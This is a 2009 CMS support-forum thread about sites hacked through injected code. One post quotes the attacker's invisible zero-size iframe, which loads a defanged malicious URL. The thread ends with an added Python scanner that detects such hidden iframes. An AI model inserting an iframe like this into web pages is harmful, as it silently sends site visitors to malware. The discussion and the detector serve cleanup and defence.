Elxis CMS Forum

Support => Security => Topic started by: speck on December 15, 2009, 01:44:33

Title: site hacked
Post by: speck on December 15, 2009, 01:44:33
 :o
All my Elxis sites have been hacked today.
I found this code in all HTML pages and in all index.php files:
<iframe src="http( : )//stats(.)yahoo-analytics(.)net/lib/index(.)php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Is it a dangerous software, so now on Google two sites are flagged as suspicious  >:(
What does this depend on??
Server?
Elxis?? Strange, because Defender is on and works nicely
Or other??? Maybe someone hates me  :o
What do I do to prevent another thing like this  ??? ???
I'm angry >:( >:(

Thanks for your advice  :)

Title: Re: site hacked
Post by: datahell on December 15, 2009, 09:40:29
I am sorry speck.
From other similar attacks in the past we have seen that, almost always, the cause of the hack is an insecure site environment and bad server/PHP setup (allow_url_fopen and register_globals are the most common causes for a successful XSS attack). Elxis Defender prevents attacks against Elxis with requests matching the Defender criteria. If you have more scripts on your site besides Elxis, then those cannot be protected by the Elxis Defender.

I advise you to search your Apache log file to find out the cause of the hack. A Google search may also give you important information about the origin/method of the attack.

http://google.com/safebrowsing/diagnostic?site=yahoo-analytics.net/

Title: Re: site hacked
Post by: speck on December 16, 2009, 12:16:14
I did a Google search before posting, but I was unsure whether that depended on Elxis or not.
Luckily not on Elxis and, about your answer, not on scripts in my Elxis sites. I don't use them; your mention is always about external scripts.
It was a general attack on some servers of my provider. In fact, after a hard day restoring all my sites, yesterday night, in Europe late morning, the provider restored all servers.

Thanks a lot Ioan, as always you're very kind with your answers and support  ;)
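
A check for the injection described in the first post, as an added example that is not part of the thread or of Elxis: it walks a web root and reports every .html/.htm/.php file that contains an iframe sized to zero or styled invisible, together with the iframe's src. The function names and the web-root argument are assumptions.

```python
import os
import re
import sys

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value attributes, quoted or bare (the injected tag in this thread mixes both)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
ZERO_RE = re.compile(r"0(px|%)?")
SCAN_EXT = (".html", ".htm", ".php")  # file types reported as modified

def parse_attrs(attr_text):
    """Return a dict mapping lower-cased attribute names to their values."""
    return {n.lower(): dq or sq or bare for n, dq, sq, bare in ATTR_RE.findall(attr_text)}

def is_hidden(attrs):
    """True when the frame is sized or styled so that a visitor cannot see it."""
    zero = any(ZERO_RE.fullmatch(attrs.get(k, "").strip()) for k in ("width", "height"))
    style = attrs.get("style", "").lower().replace(" ", "")
    return zero or style == "hidden" or "visibility:hidden" in style or "display:none" in style

def find_hidden_iframes(text):
    """Return the src value of every invisible iframe in one file's content."""
    found = (parse_attrs(m.group(1)) for m in IFRAME_RE.finditer(text))
    return [a.get("src", "") for a in found if is_hidden(a)]

def scan_tree(root):
    """Walk root and map each affected file path to the iframe sources found."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                report[path] = hits
    return report

if __name__ == "__main__":
    # Usage: python scan_iframes.py /path/to/webroot  (script name and path are assumptions)
    for path, srcs in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, "->", ", ".join(srcs))
```

Running it again after a restore confirms that no modified copy was left behind; a hit in a file that legitimately embeds a hidden frame has to be reviewed by hand.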